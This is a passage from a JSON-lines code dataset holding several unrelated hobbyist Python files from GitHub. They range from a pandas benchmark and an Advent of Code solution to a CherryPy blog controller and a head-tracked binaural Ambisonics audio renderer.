panel.transpose(2, 0, 1)\n cl = pan2['close']\n cl2 = cl[cl.iloc[:, -1] > cl.iloc[:, -2]]\n pan11 = panel[cl2.index]\n\n return pan11.items\n\nclass ProcessPandasPanelBench(object):\n\n def __init__(self, method='cProfile', limit_rows=0, db_path=None):\n self.db_path = db_path\n self.method_name = method\n self.limit_rows = limit_rows\n self.metadata = get_metadata(self.db_path)\n\n def set_method(self, method_name='cProfile'):\n if method_name not in ('cprofile', ):\n raise ValueError(\"Method name should be 'cProfile'\")\n self.method_name = method_name\n\n def run_bench_cprofile(self, panel):\n\n # FIXME: Add a Contextanager Class\n then0 = time.time()\n pr = cProfile.Profile()\n pr.enable()\n\n selectors = panel_bench_lc(panel=panel)\n\n pr.disable()\n s = StringIO()\n sort_by = 'cumulative'\n ps = pstats.Stats(pr, stream=s).sort_stats(sort_by)\n ps.print_stats(0.1)\n\n now0 = time.time()\n\n print(self.limit_rows, now0 - then0)\n print(len(selectors))\n print(s.getvalue())\n\n # FIXME: Add a Contextanager Class\n then0 = time.time()\n pr = cProfile.Profile()\n pr.enable()\n\n selectors = panel_bench_vector(panel=panel)\n\n pr.disable()\n s = StringIO()\n sort_by = 'cumulative'\n ps = pstats.Stats(pr, stream=s).sort_stats(sort_by)\n ps.print_stats(0.1)\n\n now0 = time.time()\n\n print (self.limit_rows, now0 - then0)\n print (len(selectors))\n print(s.getvalue())\n\n def run_bench(self):\n\n # setup - common\n scripdata_dict = get_hist_data_as_dataframes_dict(\n metadata=self.metadata,\n limit=self.limit_rows)\n panel = pd.Panel(scripdata_dict)\n\n print(panel)\n self.run_bench_cprofile(panel)\n\n\nif __name__ == '__main__':\n #bench = ProcessPandasPanelBench(db_path='sqlite:///nse_hist_data_test2.sqlite3',\n # limit_rows=0)\n #bench.run_bench()\n print (\"*\" * 80)\n limit = 20\n while limit <= 4000:\n bench2 = ProcessPandasPanelBench(db_path='sqlite:///nse_hist_data.sqlite3',\n limit_rows=limit)\n bench2.run_bench()\n limit *= 2\n","repo_name":"hyphenOs/tickdownload","sub_path":"process_pd_panel_bench.py","file_name":"process_pd_panel_bench.py","file_ext":"py","file_size_in_byte":3034,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"38"} +{"seq_id":"17105928719","text":"from http.server import BaseHTTPRequestHandler, HTTPServer\nimport xmltodict\nimport requests\nfrom datetime import timedelta, date\nimport time\n\ndef daterange(start_date, end_date):\n for n in range(int ((end_date - start_date).days)):\n yield start_date + timedelta(n)\n \nstart_date = date(2016, 9, 1)\nend_date = date(2017, 9, 2)\n\nprecio1 = {}\nfor i in range(0, 25):\n precio1[i] = 0.0\nprecio2 = {}\nfor i in range(0, 25):\n precio2[i] = 0.0\ncantidad = 0\n\nfor single_date in daterange(start_date, end_date):\n d = single_date.strftime(\"%d-%m-%Y\")\n r = requests.get(\"https://api.esios.ree.es/archives/80/download?date=\" + d)\n print(d)\n time.sleep(0.2)\n doc = xmltodict.parse(r.text)\n for tarifa in doc['PVPCDesgloseHorario']['SeriesTemporales']:\n if 'TipoPrecio' in tarifa and 'TerminoCosteHorario' in tarifa and tarifa['TipoPrecio']['@v'] == \"Z01\" and tarifa['TerminoCosteHorario']['@v'] ==\"FEU\":\n n = 0\n cantidad += 1\n for i in tarifa['Periodo']['Intervalo']:\n precio1[n] += float(i['Ctd']['@v'])\n n += 1\n if 'TipoPrecio' in tarifa and 'TerminoCosteHorario' in tarifa and tarifa['TipoPrecio']['@v'] == \"Z02\" and tarifa['TerminoCosteHorario']['@v'] ==\"FEU\":\n n = 0\n cantidad += 1\n for i in tarifa['Periodo']['Intervalo']:\n precio2[n] += float(i['Ctd']['@v'])\n n += 1\n \nprint(precio1)\nprint(precio2)\nprint(cantidad)\n","repo_name":"4m1g0/downloadEnergyPricesPeriod","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"36725376531","text":"import time\nimport threading\n\n\ndef consumer(cond):\n t = threading.current_thread()\n with cond:\n cond.wait() # wait()方法创建了一个名为waiter的锁,并且设置锁的状态为locked。这个waiter锁用于线程间的通讯\n # time.sleep(2)\n print('{}: Resource is available to consumer'.format(t.name))\n\n\ndef producer(cond):\n t = threading.current_thread()\n with cond:\n print('{}: Making resource available'.format(t.name))\n # cond.acquire()\n cond.notifyAll() # 释放waiter锁,唤醒消费者\n # time.sleep(5)\n # cond.release()\n\n\ncondition = threading.Condition()\n\nc1 = threading.Thread(name='c1', target=consumer, args=(condition,))\nc2 = threading.Thread(name='c2', target=consumer, args=(condition,))\np = threading.Thread(name='p', target=producer, args=(condition,))\n\nc2.start()\ntime.sleep(1)\nc1.start()\ntime.sleep(1)\np.start()\n","repo_name":"eason-shsf/producer-consumer","sub_path":"src_behavior/bark/dongwm/dwmCondition.py","file_name":"dwmCondition.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"29024804997","text":"#!/usr/bin/env/python3\n\ndef inverse(instruction):\n return 'nop' if instruction == 'jmp' else 'jmp'\n\ndef main():\n with open('day08.txt') as f:\n program = []\n i = 0\n for l in f:\n program.append((i, l[0:3], int(l[4:])))\n i += 1\n\n acc1 = 0\n done = []\n operation = program[0]\n while 1:\n if operation in done:\n break\n\n done.append(operation)\n index = operation[0]\n instruction = operation[1]\n value = operation[2]\n\n if 'acc' in instruction:\n acc1 += value\n index += 1\n elif 'jmp' in instruction:\n index += value\n else:\n index += 1\n\n operation = program[index]\n\n print(acc1)\n\n\n acc2 = 0\n done = []\n tested = []\n operation = program[0]\n testing = False\n while 1:\n if operation in done:\n operation = program[0]\n done = []\n acc2 = 0\n testing = False\n\n done.append(operation)\n index = operation[0]\n instruction = operation[1]\n value = operation[2]\n\n if not testing and (instruction == 'jmp' or instruction == 'nop') and not operation in tested:\n tested.append(operation)\n instruction = inverse(instruction)\n testing = True\n\n if instruction == 'acc':\n acc2 += value\n index += 1\n elif instruction == 'jmp':\n index += value\n else:\n index += 1\n\n if index == len(program):\n break\n\n operation = program[index]\n\n print(acc2)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"zarov/AdventOfCode2020","sub_path":"day08.py","file_name":"day08.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"44636817268","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql.functions import regexp_replace,col,translate,regexp_extract,instr\nspark = SparkSession.builder.appName(\"Pyspark example\").getOrCreate()\n\ndf= spark.read.format(\"csv\").option(\"header\",\"true\").option(\"inferSchema\",\"true\").load(\"C:/Users/Lenovo/Desktop/spark_data/retail_store.csv\")\n#'regexp_replace' is used to replace substitute color names with NOCOLOR\nstr1=\"BLACK|WHITE|RED|BLUE|GREEN\"\ndf.select(regexp_replace(col(\"Description\"),str1,\"NOCOLOR\").alias(\"no_color_column\"),col(\"Description\")).show(5)\n\n#'translate' function is to replace given characters with other characters\ndf.select(translate(col(\"Description\"),\"ABCD\",\"1234\"),col(\"Description\")).show(5)\n\n#'regexp_extract' is used to extract values\ndf.select(regexp_extract(col(\"Description\"),str1,0).alias(\"color\"),col(\"Description\")).show(5)\n\n#'instr' function checks for the existance of a value\ncontainsRed= instr(col(\"Description\"),\"RED\")>=1\ncontainsWhite= instr(col(\"Description\"),\"WHITE\")>=1\ndf.withColumn(\"hasColor\",containsWhite| containsRed).where(\"hasColor\").select(\"Description\").show(5)","repo_name":"Sushmitha2708/Spark","sub_path":"Python/Spark Data Types/StringsWithRegularExpressions.py","file_name":"StringsWithRegularExpressions.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"32925738017","text":"import os\r\ndef Diff(li1, li2):\r\n return (list(list(set(li1)-set(li2)) + list(set(li2)-set(li1))))\r\n\r\n\r\nwidth_percent=input(\"Choose width as % of page: \")\r\noverride_current=input(\"Would you like to over-ride current formatting? reply with Y or N \")\r\ntrim_path=input(\"Would you like to trim images full path? reply with Y or N \")\r\npath_to_file=input(\"Paste path to your .lyx file here: \")\r\n\r\nf = open(path_to_file, \"r\")\r\n\r\ncontents = f.readlines()\r\nf.close()\r\n\r\nlyx_filename_path, lyx_filename_tail=os.path.split(path_to_file)\r\ncurr_dir = os.listdir(os.getcwd())\r\n\r\nif path_to_file.endswith('.lyx'):\r\n\r\n for num, line in enumerate(contents, 1):\r\n\r\n #for line in contents:\r\n if \"filename\" in line:\r\n # this is the graphic's line\r\n # trim path of object if it is in the same dir\r\n if trim_path==\"Y\":\r\n words_of_line=line.split(\" \")\r\n for index,word in enumerate(line,1):\r\n if word==\"filename\":\r\n #check if it's long path or not\r\n if str(curr_dir) in words_of_line[index+1]:\r\n obj_path= words_of_line[index+1]\r\n head, tail = os.path.split(obj_path)\r\n #change full path to filename only, assuming it is in the same folder!!\r\n words_of_line[index+1]=tail\r\n\r\n if override_current==\"N\":\r\n if \"width\" not in contents[num+1]:\r\n # means it is NOT already formatted\r\n print(contents[num])\r\n contents.insert(num, \"\twidth {}page%\\n\".format(width_percent))\r\n # else:\r\n # # add comment to show you have been there\r\n # contents[num+1]=\"% SKIPPED\twidth {}page%\\n\".format(width_percent)\r\n\r\n # OVER RIDING EXISTING FORMATTING\r\n else:\r\n if \"width\" in contents[num+1]:\r\n # means it is not already formatted\r\n contents.insert(num, \"\twidth {}page%\\n\".format(width_percent))\r\n else:\r\n # replace current with new settings\r\n contents[num]=\"\twidth {}page%\\n\".format(width_percent)\r\n\r\nelse:\r\n print(\"It isn't a .lyx file\\n\")\r\n f.close()\r\n exit(1)\r\n\r\nf = open(path_to_file, \"w\")\r\ncontents = \"\".join(contents)\r\n#f.writelines(contents) #possible improvement\r\nprint(\"{} was handled successfully \".format(lyx_filename_tail))\r\nf.write(contents)\r\nf.close()\r\n","repo_name":"omer-re/Lyx_fix","sub_path":"lyx_fix3.py","file_name":"lyx_fix3.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"38712081505","text":"import cherrypy\nimport json\nfrom datetime import datetime\nfrom components.subcomponents import b64\n\nfrom db import User, Post, session, Media, Like, Comment\n\nfrom components.templater import create_post, posts_list, post_details\nfrom datetime import datetime\n\ndef get_date():\n return datetime.now()\n\nclass Posts:\n @cherrypy.expose\n def index(self):\n if 'username' and 'is_admin' and 'is_authenticated' not in cherrypy.session:\n cherrypy.session['username'] = 'Guest'\n cherrypy.session['is_admin'] = False\n cherrypy.session['is_authenticated'] = False\n print(cherrypy.session['username'])\n all_posts = session.query(Post)\n return posts_list.render(cur_user=cherrypy.session['username'],posts=all_posts)\n \n @cherrypy.expose\n @cherrypy.popargs('id')\n def post(self, id):\n \n if 'username' and 'is_admin' and 'is_authenticated' not in cherrypy.session:\n cherrypy.session['username'] = 'Guest'\n cherrypy.session['is_admin'] = False\n cherrypy.session['is_authenticated'] = False\n \n print(f'Post id: {id}')\n post_obj = session.query(Post).filter(Post.post_id==id).first()\n # print(stuff.title, stuff.post_comments)\n curUser = cherrypy.session['username']\n login_status = cherrypy.session['is_authenticated']\n return post_details.render(postObj=post_obj, cur_user=curUser, userStatus=login_status)\n \n @cherrypy.expose\n def like(self):\n likeData = json.loads(cherrypy.request.body.read())\n print(likeData)\n # viewer = session.query(User).filter(User.username==likeData['viewer']).first()\n queryPost = session.query(Post).filter(Post.post_id==likeData['postid']).first()\n \n queryPost.like_action(likeData['viewer'])\n if viewer:\n for like in queryPost.likes:\n if like.user.username == likeData['viewer']:\n session.query(Like).filter(Like.like_id==like.like_id).delete()\n session.commit()\n numLike = {'unlike': len(queryPost.likes)}\n print('Took my like back!')\n return numLike\n \n elif like.user.username != likeData['viewer']:\n newLike = Like(post_id=likeData['postid'], user_id=viewer.user_id, post=queryPost, user=viewer)\n session.add(newLike)\n session.commit()\n \n print(cherrypy.session[\"username\"], ' likes post ', f'{likeData[\"postid\"]}',' by ', f'{queryPost.author.username}')\n print(len(queryPost.likes))\n numLike = {'like': len(queryPost.likes)}\n print('Added a like!')\n return numLike\n else:\n return json.dumps({'err': 'User not logged in'})\n @cherrypy.expose\n def get_likes(self, postid):\n dePost = session.query(Post).filter(Post.post_id==postid).first()\n \n numLike = {'num_likes': len(dePost.likes)}\n \n return json.dumps(numLike)\n \n \n @cherrypy.expose\n def comment(self):\n pdata = json.load(cherrypy.request.body)\n print(pdata['author'])\n if pdata['author'] != 'Guest' or pdata['author'] != '':\n queryAuthor = session.query(User).filter(User.username==pdata['author']).first()\n queryPost = session.query(Post).filter(Post.post_id==pdata['postid']).first()\n newComment = Comment(user_id=queryAuthor.user_id, post_id=queryPost.post_id, user=queryAuthor, post=queryPost, comment=pdata['comment'])\n session.add(newComment)\n session.commit()\n \n else:\n return 'Error commenting'\n \n return 'Success'\n \n @cherrypy.expose \n def create_post(self):\n if 'username' and 'is_authenticated' not in cherrypy.session:\n raise cherrypy.HTTPRedirect('/login')\n \n elif cherrypy.session['username'] == 'Guest' or cherrypy.session['is_authenticated'] == False:\n raise cherrypy.HTTPRedirect('/login')\n \n elif cherrypy.session['username'] != 'Guest' or cherrypy.session['username'] != '':\n curUser = cherrypy.session['username']\n user = session.query(User).filter(User.username==cherrypy.session['username']).first()\n return create_post.render(cur_user=curUser, user=user)\n \n @cherrypy.expose\n @cherrypy.tools.json_in()\n def add_post(self):\n \"\"\"Accepts a dictionary containing post text and image/video file (if any)\"\"\"\n if 'username' and 'is_authenticated' not in cherrypy.session:\n raise cherrypy.HTTPRedirect('/login')\n elif cherrypy.session['username'] == 'Guest' or cherrypy.session['is_authenticated'] == False:\n raise cherrypy.HTTPRedirect('/login')\n \n pdata = cherrypy.request.json\n author = session.query(User).filter(User.username==pdata['author']).first()\n \n if pdata:\n try:\n newpost = Post(content=pdata['writeup'], author=author)\n session.add(newpost)\n session.commit()\n \n lastpost = session.query(Post).filter(Post.content==newpost.content).first()\n file_list = []\n if pdata['media']:\n for file in pdata['media']:\n gPath = 'assets'\n sPath = f'/media/uploads/images/{file[\"name\"]}'\n splitPath = sPath.split('/')\n binPath = f'/media/uploads/bin/{file[\"name\"]}'\n \n print(file['name'])\n \n newImg = b64.decode_file(file, gPath, sPath, binPath)\n \n newfile = Media(\n media_title=file['name'],\n media_path=sPath,\n media_type=file['type'],\n user_id=lastpost.author.user_id,\n post_id=lastpost.post_id,\n user=session.query(User).filter(User.user_id==lastpost.user_id).first(), post=lastpost\n )\n session.add(newfile)\n session.commit()\n file_list.append(newfile)\n lastpost.media_attachment=[x for x in file_list]\n except Exception as e:\n print('The error is here', e)\n \n # print(cherrypy.request.json)\n # print(newpost)\n return \"Post Created!\"\n \n @cherrypy.expose\n @cherrypy.tools.json_out()\n def get_media(self, postID):\n postMedia = session.query(Post).filter(Post.post_id==postID).first()\n media_list = []\n for media in postMedia.media_attachment:\n data = open('assets' + media.media_path, 'r')\n mediaData = {\n 'title': media.media_title,\n 'type': media.media_type,\n 'data': data.read(),\n 'post_id': media.post.post_id\n }\n media_list.append(mediaData)\n print(media.media_path)\n \n return media_list\n \n @cherrypy.expose\n @cherrypy.tools.json_out()\n def get_photos(self, userID):\n queryUser = session.query(User).filter(User.user_id==userID).first()\n media_list = []\n for media in queryUser.media:\n data = open('assets' + media.media_path, 'r')\n mediaData = {\n 'title': media.media_title,\n 'type': media.media_type,\n 'data': data.read(),\n 'post_id': media.post.post_id\n }\n media_list.append(mediaData)\n print(media.media_path)\n \n return media_list","repo_name":"Maxprosper22/AVLBlog","sub_path":"components/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":8053,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"33427829211","text":"#!/usr/bin/env python\n\n\nfrom gmusicapi import Musicmanager\n\n\ndef authenticate():\n \"\"\"Make an instance of the api and attempts to authenticate the user.\n Return the authenticated api.\n \"\"\"\n\n # We are uploading and then downloading so we want Musicmanager\n api = Musicmanager()\n\n # Attempt to authenticate and log in\n logged_in = api.login()\n\n # If login() returns false, you have not performed oauth yet, or did not\n # write your credentials to your disk. Using oauth allows authentication\n # without providing plaintext credentials to the application\n if not logged_in:\n print('No oauth credentials found, please authenticate your account')\n\n # Performs oauth and stores generated credentials to Appdirs \n # 'user_data_dir' by default. oauth only needs to be performed once per \n # machine if the credentials are stored, which is the default behavior.\n authenticated = api.perform_oauth(open_browser=True)\n else:\n print('Successfully logged in.\\n')\n\n return api\n\n\ndef demonstrate():\n \"\"\" Demonstrate some api features. \"\"\"\n\n api = authenticate()\n\n # Demonstrate upload feature.\n # Create a list of one or more file paths of the mp3s you would like \n # to upload\n filepaths = []\n filepaths.append('./song1.mp3')\n\n # Upload an mp3 to your library. upload() returns a tuple of information\n # about the success or failure of uploads\n print(\"Beginning upload...\\n\")\n uploaded = api.upload(filepaths) \n\n # Print all successfully uploaded songs\n if len(uploaded[0]) > 0:\n print(\"Successfully uploaded:\")\n i = 1\n for key in uploaded[0]:\n print(\"%d. %s\" % (i, key))\n i += 1\n\n # Print all unsuccessfully uploaded songs and a description of why\n # songs weren't uploaded\n if len(uploaded[2]) == 0:\n print(\"\\nAll songs successfully uploaded.\")\n else:\n print(\"Not all songs were successfully uploaded:\")\n i = 1\n for key in uploaded[2]:\n print(\"%d. %s not uploaded: %s\" % (i, key, uploaded[2][key]))\n i += 1\n\n\n # Demonstrate download feature\n # Get information about songs previously uploaded that are available\n # to be downloaded\n uploaded_songs = api.get_uploaded_songs()\n\n if len(uploaded_songs) == 0:\n print(\"There are no songs currently available for download\")\n else:\n # Print songs that are available for download and store their ids\n # so we can download them\n song_ids = []\n print(\"\\nThe following songs are available for download\")\n for i in range(len(uploaded_songs)):\n song_ids.append(uploaded_songs[i]['id'])\n print(\"%d. %s\" % (i+1, uploaded_songs[i]['title']))\n\n # Download uploaded songs from your library\n print(\"\\nBeginning download...\")\n for i in range(len(song_ids)):\n filename, audio = api.download_song(song_ids[i])\n\n # Write song to disk\n with open(filename, 'wb') as f:\n f.write(audio)\n\n print(\"%d. Written to ./%s\" % (i + 1, filename))\n print(\"\\nDownload complete.\")\n\n # It's good practice to logout when finished\n api.logout()\n\n\nif __name__ == '__main__':\n demonstrate()\n ","repo_name":"simon-weber/gmusicapi","sub_path":"musicmanager_example.py","file_name":"musicmanager_example.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","stars":2498,"dataset":"github-code","pt":"38"} +{"seq_id":"11290867016","text":"import jieba\r\nfrom jieba import analyse\r\nfrom os import path\r\n\r\ncur_path = path.dirname(__file__) # 获取当前脚本路径\r\ntext_path = 'C000008/10.txt' # 设置要分析的文本路径\r\ntext = open(path.join(cur_path, text_path), \"r\").read()\r\ntext = text.rstrip() # 清除文本后边空白符\r\ntext = text[10:] # 清除前边格式内容\r\n\r\n\r\n# input_text : 输入的文本(已经处理好)\r\n# topN : 输出出现次数最高的 N 个词汇的词频,以及与最大词频之比\r\ndef word_freq_count(input_text, topN):\r\n print(\"------此文档:合计有{}个字符------\".format(len(input_text)))\r\n dic = {}\r\n\r\n # jieba 分词\r\n cut_words = jieba.cut(input_text, cut_all=False, HMM=True)\r\n\r\n # 取出分词结果中字长大于 1 的词并统计,统计结果\r\n for word in cut_words:\r\n if len(word) == 1:\r\n continue # 字长为1的去掉\r\n if word in dic:\r\n dic[word] += 1 # 计数加一\r\n else:\r\n dic[word] = 1 # 字典没有则添加\r\n\r\n dic = list(dic.items()) # 将 items() 返回的元组转换为列表\r\n\r\n dic.sort(key=lambda x: x[1], reverse=True) # lambda 对第二维数据排序\r\n\r\n # 输出统计结果\r\n print(\"num words times wf_ratio\")\r\n print(\"----------------------------------------\")\r\n for i in range(topN): # 对出现次数最多的前 topN 个 词汇进行遍历统计\r\n word = dic[i][0] # 被统计词汇\r\n count = dic[i][1] # 词汇出现的次数\r\n wf_ratio = dic[i][1]/dic[0][1] # 词频/最大词频\r\n print(\"{:<5}{:<10}{: ^10}{:>5}\".format(i+1, word, count, wf_ratio))\r\n\r\n\r\nif __name__ == '__main__':\r\n word_freq_count(text, 20) # 统计文本 text 中前 20 个词频最高的词汇的情况\r\n\r\n\r\n","repo_name":"zero1248/tools","sub_path":"python/pkg_test/jieba_test/word_freq_count.py","file_name":"word_freq_count.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"13060983852","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue May 30 18:58:39 2023\r\n\r\n@author: Arya\r\n\"\"\"\r\ndef most_frequent():\r\n print('Enter word as string:',end='')\r\n str1=input()\r\n freq={}\r\n for i in str1:\r\n freq[i]=freq.get(i,0)+1\r\n ordered=sorted(freq,key=freq.get,reverse=True)\r\n print('Frequency of letters entered as string in decending order is:')\r\n for i in ordered:\r\n print(i,'=',freq[i])\r\n \r\nmost_frequent()\r\n\r\n","repo_name":"AryaJadhav303/MyCaptain_assignments","sub_path":"Assignment_5_Most frequent.py","file_name":"Assignment_5_Most frequent.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"71993411952","text":"\n# coding: utf-8\n\n# In[8]:\n\n\nimport serial\nser = serial.Serial('/dev/tty.usbserial-AH03F9XC') # open serial port\nser.baudrate = 57600 #if other rate it changes to byte mode\n\n\n# In[26]:\n\n\n#load modules\nimport numpy as np\nfrom __future__ import division\nfrom __future__ import print_function\nimport argparse\ntry:\n import queue # Python 3.x\nexcept ImportError:\n import Queue as queue # Python 2.x\nimport sys\nimport threading\n\n#choose any B-format sound file in FuMa format (Channel order W, X, Y, Z)\nfilename = 'filename.wav'\nclientname = 'file_player'\nbuffersize = 20\nmanual = False\n\nif buffersize < 1:\n parser.error('buffersize must be at least 1')\n\nq = queue.Queue(maxsize=buffersize)\nevent = threading.Event()\n\n\ndef print_error(*args):\n print(*args, file=sys.stderr)\n\n\ndef xrun(delay):\n print_error(\"An xrun occured, increase JACK's period size?\")\n\n\ndef shutdown(status, reason):\n print_error('JACK shutdown!')\n print_error('status:', status)\n print_error('reason:', reason)\n event.set()\n\n\ndef stop_callback(msg=''):\n if msg:\n print_error(msg)\n for port in client.outports:\n port.get_array().fill(0)\n event.set()\n raise jack.CallbackExit\n\n \n \n\ndef process(frames):\n if frames != blocksize:\n stop_callback('blocksize must not be changed, I quit!')\n try:\n data = q.get_nowait()\n except queue.Empty:\n stop_callback('Buffer is empty: increase buffersize?')\n if data is None:\n stop_callback() # Playback is finished\n \n lines = str(ser.read(ser.in_waiting)).split('#') #list with all returned lines from head tracker\n if ',' in lines[-1]:\n yaw = float(lines[-1].split('=')[1].split(',',1)[0])\n else:\n yaw = float(lines[-2].split('=')[1].split(',',1)[0])\n \n if my_buffer.count == 0:\n my_buffer.offset = yaw\n my_buffer.count += 1\n \n angle = -(yaw-my_buffer.offset)\n rad = angle*np.pi/180\n XX = np.sin(rad)*data.T[2,:]+np.cos(rad)*data.T[1,:]\n YY = np.cos(rad)*data.T[2,:]-np.sin(rad)*data.T[1,:]\n \n #print('Angle:',angle)\n \n #spherical speaker array\n D45 = driver_signal(2,70*np.pi/180,np.pi/4,data.T[0,:],YY,data.T[3,:],XX)*20000\n D45_bl_L = np.convolve(D45,L45)\n D45_bl_R = np.convolve(D45,R45)\n D135 = driver_signal(2,115*np.pi/180,3*np.pi/4,data.T[0,:],YY,data.T[3,:],XX)*20000\n D135_bl_L = np.convolve(D135,L135)\n D135_bl_R = np.convolve(D135,R135)\n D225 = driver_signal(2,65*np.pi/180,5*np.pi/4,data.T[0,:],YY,data.T[3,:],XX)*20000\n D225_bl_L = np.convolve(D225,L225)\n D225_bl_R = np.convolve(D225,R225)\n D315 = driver_signal(2,110*np.pi/180,7*np.pi/4,data.T[0,:],YY,data.T[3,:],XX)*20000\n D315_bl_L = np.convolve(D315,L315)\n D315_bl_R = np.convolve(D315,R315)\n \n \n client.outports[0].get_array()[:] = np.hstack((D45_bl_L[0:sizeHRIR-1]+my_buffer.BL45,D45_bl_L[sizeHRIR-1:blocksize]))+np.hstack((D315_bl_L[0:sizeHRIR-1]+my_buffer.BL315,D315_bl_L[sizeHRIR-1:blocksize]))+np.hstack((D135_bl_L[0:sizeHRIR-1]+my_buffer.BL135,D135_bl_L[sizeHRIR-1:blocksize]))+np.hstack((D225_bl_L[0:sizeHRIR-1]+my_buffer.BL225,D225_bl_L[sizeHRIR-1:blocksize])) #assign first channel to out_1\n client.outports[1].get_array()[:] = np.hstack((D45_bl_R[0:sizeHRIR-1]+my_buffer.BR45,D45_bl_R[sizeHRIR-1:blocksize]))+np.hstack((D315_bl_R[0:sizeHRIR-1]+my_buffer.BR315,D315_bl_R[sizeHRIR-1:blocksize]))+np.hstack((D135_bl_R[0:sizeHRIR-1]+my_buffer.BR135,D135_bl_R[sizeHRIR-1:blocksize]))+np.hstack((D225_bl_R[0:sizeHRIR-1]+my_buffer.BR225,D225_bl_R[sizeHRIR-1:blocksize])) #assign second channel to out_2\n my_buffer.BL45 = D45_bl_L[blocksize:]\n my_buffer.BR45 = D45_bl_R[blocksize:]\n my_buffer.BL135 = D135_bl_L[blocksize:]\n my_buffer.BR135 = D135_bl_R[blocksize:]\n my_buffer.BL225 = D225_bl_L[blocksize:]\n my_buffer.BR225 = D225_bl_R[blocksize:]\n my_buffer.BL315 = D315_bl_L[blocksize:]\n my_buffer.BR315 = D315_bl_R[blocksize:]\n \n \n \n#determine driver signals according to equation (2.15) in the thesis\n#theta: colatitude, phi: azimuth, R array radius\ndef driver_signal(R,theta,phi,A00,A1min1,A10,A11):\n nm00 = (1/(2*np.pi*R**2))*np.sqrt(1/(4*np.pi))*(1/(4*np.pi))*A00\n nm1min1 = (1/(2*np.pi*R**2))*np.sqrt(3/(4*np.pi))*(np.sin(theta)*np.sin(phi)/(4*np.pi))*A1min1\n nm10 = (1/(2*np.pi*R**2))*np.sqrt(3/(4*np.pi))*(np.cos(theta)/(4*np.pi))*A10\n nm11 = (1/(2*np.pi*R**2))*np.sqrt(3/(4*np.pi))*(np.sin(theta)*np.cos(phi)/(4*np.pi))*A11\n return nm00+nm1min1+nm10+nm11\n\n#Import HRTF data from Matlab file\nimport scipy.io as sio\nmat_content = sio.loadmat('HRTF_nh163.mat')\n\n\nL45 = mat_content['aaL441_eq'].flatten() #left ear HRIR for loudspeaker at 45 degree azimuth\nR45 = mat_content['aaR441_eq'].flatten() #right ear ...\nL135 = mat_content['bbL441_eq'].flatten()\nR135 = mat_content['bbR441_eq'].flatten()\nL225 = mat_content['ccL441_eq'].flatten()\nR225 = mat_content['ccR441_eq'].flatten()\nL315 = mat_content['ddL441_eq'].flatten()\nR315 = mat_content['ddR441_eq'].flatten()\n \nsizeHRIR = len(L45)\n\nclass buff:\n pass\n \n#instance of class buff\nmy_buffer = buff()\n\nmy_buffer.count = 0\nmy_buffer.offset = 0\nmy_buffer.BL45 = np.zeros(len(L45)-1)\nmy_buffer.BR45 = np.zeros(len(L45)-1)\nmy_buffer.BL135 = np.zeros(len(L45)-1)\nmy_buffer.BR135 = np.zeros(len(L45)-1)\nmy_buffer.BL225 = np.zeros(len(L45)-1)\nmy_buffer.BR225 = np.zeros(len(L45)-1)\nmy_buffer.BL315 = np.zeros(len(L45)-1)\nmy_buffer.BR315 = np.zeros(len(L45)-1)\n\n#clean buffer (fixed to 1020 bytes length) and queue with old data occuring between two calls of this script\nwhile ser.in_waiting == 1020:\n clean_buffer = ser.read(ser.in_waiting)\n #print('cleaning') \n \n \ntry:\n import jack\n import soundfile as sf\n \n client = jack.Client(clientname)\n\n \n blocksize = client.blocksize\n samplerate = client.samplerate\n client.set_xrun_callback(xrun)\n client.set_shutdown_callback(shutdown)\n client.set_process_callback(process)\n \n with sf.SoundFile(filename) as f:\n for ch in range(2):\n client.outports.register('out_{0}'.format(ch + 1))\n block_generator = f.blocks(blocksize=blocksize, dtype='float32',\n always_2d=True, fill_value=0)\n for _, data in zip(range(buffersize), block_generator):\n q.put_nowait(data) # Pre-fill queue\n with client:\n if not manual:\n target_ports = client.get_ports(is_physical=True, is_input=True, is_audio=True)\n if len(client.outports) == 1 and len(target_ports) > 1:\n # Connect mono file to stereo output\n client.outports[0].connect(target_ports[0])\n client.outports[0].connect(target_ports[1])\n else:\n for source, target in zip(client.outports, target_ports):\n source.connect(target)\n timeout = blocksize * buffersize / samplerate\n for data in block_generator:\n q.put(data, timeout=timeout)\n q.put(None, timeout=timeout) # Signal end of file\n event.wait() # Wait until playback is finished\nexcept KeyboardInterrupt:\n print('\\nInterrupted by user')\nexcept (queue.Full):\n # A timeout occured, i.e. there was an error in the callback\n parser.exit(1)\nexcept Exception as e:\n parser.exit(type(e).__name__ + ': ' + str(e))\n\n","repo_name":"kilian-schufo/B-Format-masters-thesis","sub_path":"Binaural_Renderer.py","file_name":"Binaural_Renderer.py","file_ext":"py","file_size_in_byte":7394,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"} +{"seq_id":"29126008171","text":"from ..error import SLValueError\nfrom types import NoneType\n\nTYPE_TO_STRING_TABLE = {\n str: \"str\",\n int: \"int\",\n float: \"float\",\n bool: \"bool\",\n list: \"array\",\n NoneType: \"none\",\n}\n\n\nclass TypeBuiltins:\n def type(self, value):\n return TYPE_TO_STRING_TABLE[type(value)]\n\n def to_int(self, value):\n 